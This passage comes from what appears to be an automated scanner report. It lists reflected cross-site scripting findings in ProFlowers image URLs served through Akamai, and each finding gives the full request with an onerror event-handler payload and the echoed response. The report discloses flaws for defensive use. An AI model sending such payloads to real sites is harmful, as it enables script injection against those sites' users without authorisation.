User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF34857<img src=a onerror=alert(1)>40952913b8

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd was submitted in the REST URL parameter 9. This input was echoed as c211e<img src=a onerror=alert(1)>87d2347cfbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img%20src%3da%20onerror%3dalert(1)>87d2347cfbd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inltpnkrosalea_victin10_PFc211e<img src=a onerror=alert(1)>87d2347cfbd

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188 was submitted in the REST URL parameter 9. This input was echoed as f0c74<img src=a onerror=alert(1)>ba3c5695188 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img%20src%3da%20onerror%3dalert(1)>ba3c5695188?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PFf0c74<img src=a onerror=alert(1)>ba3c5695188

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08 was submitted in the REST URL parameter 9. This input was echoed as e53ea<img src=a onerror=alert(1)>797c7d57c08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img%20src%3da%20onerror%3dalert(1)>797c7d57c08?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkanthur_sqwht09_le53ea<img src=a onerror=alert(1)>797c7d57c08

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c was submitted in the REST URL parameter 9. This input was echoed as ec4fd<img src=a onerror=alert(1)>179007b844c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img%20src%3da%20onerror%3dalert(1)>179007b844c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PFec4fd<img src=a onerror=alert(1)>179007b844c

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529 was submitted in the REST URL parameter 9. This input was echoed as 962c9<img src=a onerror=alert(1)>9f2e498f529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img%20src%3da%20onerror%3dalert(1)>9f2e498f529?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF962c9<img src=a onerror=alert(1)>9f2e498f529

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029 was submitted in the REST URL parameter 9. This input was echoed as 1aae3<img src=a onerror=alert(1)>6ccde723029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img%20src%3da%20onerror%3dalert(1)>6ccde723029?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF1aae3<img src=a onerror=alert(1)>6ccde723029

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5 was submitted in the REST URL parameter 9. This input was echoed as 3be1c<img src=a onerror=alert(1)>33e58a7dff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img%20src%3da%20onerror%3dalert(1)>33e58a7dff5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:06 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF3be1c<img src=a onerror=alert(1)>33e58a7dff5

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload da54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de was submitted in the REST URL parameter 9. This input was echoed as da54c<img src=a onerror=alert(1)>2d8a02251de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img%20src%3da%20onerror%3dalert(1)>2d8a02251de?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inrosylwurn_victin10_PFda54c<img src=a onerror=alert(1)>2d8a02251de

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860 was submitted in the REST URL parameter 9. This input was echoed as fb488<img src=a onerror=alert(1)>9985bf4a860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_lfb488<img%20src%3da%20onerror%3dalert(1)>9985bf4a860?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:54 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6insucculent_zinc09_lfb488<img src=a onerror=alert(1)>9985bf4a860

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b was submitted in the REST URL parameter 9. This input was echoed as 2bf12<img src=a onerror=alert(1)>307ef96990b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img%20src%3da%20onerror%3dalert(1)>307ef96990b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF2bf12<img src=a onerror=alert(1)>307ef96990b

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f was submitted in the REST URL parameter 9. This input was echoed as 9953a<img src=a onerror=alert(1)>0606794631f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img%20src%3da%20onerror%3dalert(1)>0606794631f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLT8inspath_wdtpr09_l9953a<img src=a onerror=alert(1)>0606794631f

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043 was submitted in the REST URL parameter 9. This input was echoed as 93ba9<img src=a onerror=alert(1)>0ab92364043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img%20src%3da%20onerror%3dalert(1)>0ab92364043?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/PLT_8inwhpot_PC1795_SQ93ba9<img src=a onerror=alert(1)>0ab92364043

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d was submitted in the REST URL parameter 9. This input was echoed as 6afb8<img src=a onerror=alert(1)>a4c35050e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF6afb8<img%20src%3da%20onerror%3dalert(1)>a4c35050e8d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTangeltree10_PF6afb8<img src=a onerror=alert(1)>a4c35050e8d

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f was submitted in the REST URL parameter 9. This input was echoed as f3028<img src=a onerror=alert(1)>05cd2cada1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img%20src%3da%20onerror%3dalert(1)>05cd2cada1f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/PLTazaleabons10_bloom_PFf3028<img src=a onerror=alert(1)>05cd2cada1f

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3 was submitted in the REST URL parameter 9. This input was echoed as 9510f<img src=a onerror=alert(1)>aefbe9bcc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF9510f<img%20src%3da%20onerror%3dalert(1)>aefbe9bcc3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLTgdnabonsai2_PF9510f<img src=a onerror=alert(1)>aefbe9bcc3

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload daa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7 was submitted in the REST URL parameter 9. This input was echoed as daa33<img src=a onerror=alert(1)>f1e0c05c9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

